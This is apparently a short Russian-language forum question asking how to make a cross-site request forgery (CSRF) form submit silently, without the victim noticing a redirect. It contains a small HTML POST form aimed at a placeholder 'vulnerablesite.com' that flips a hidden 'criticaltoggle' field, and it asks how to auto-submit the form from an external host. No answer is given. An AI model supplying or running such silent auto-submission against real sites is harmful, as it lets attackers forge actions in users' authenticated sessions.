Мне интересно узнать, как можно тихо отправить форму POST для CSRF без уведомления пользователя (расположение документа, перенаправленное на POSTed URL, не является тихим).
Пример:
<form method='POST' action='http://vulnerablesite.com/form.php'>
<input type='hidden' name='criticaltoggle' value='true'
<input type='submit' value='submit'>
</form>
На внешнем узле, что мне нужно сделать, чтобы автоматически запускать эту форму и тихо?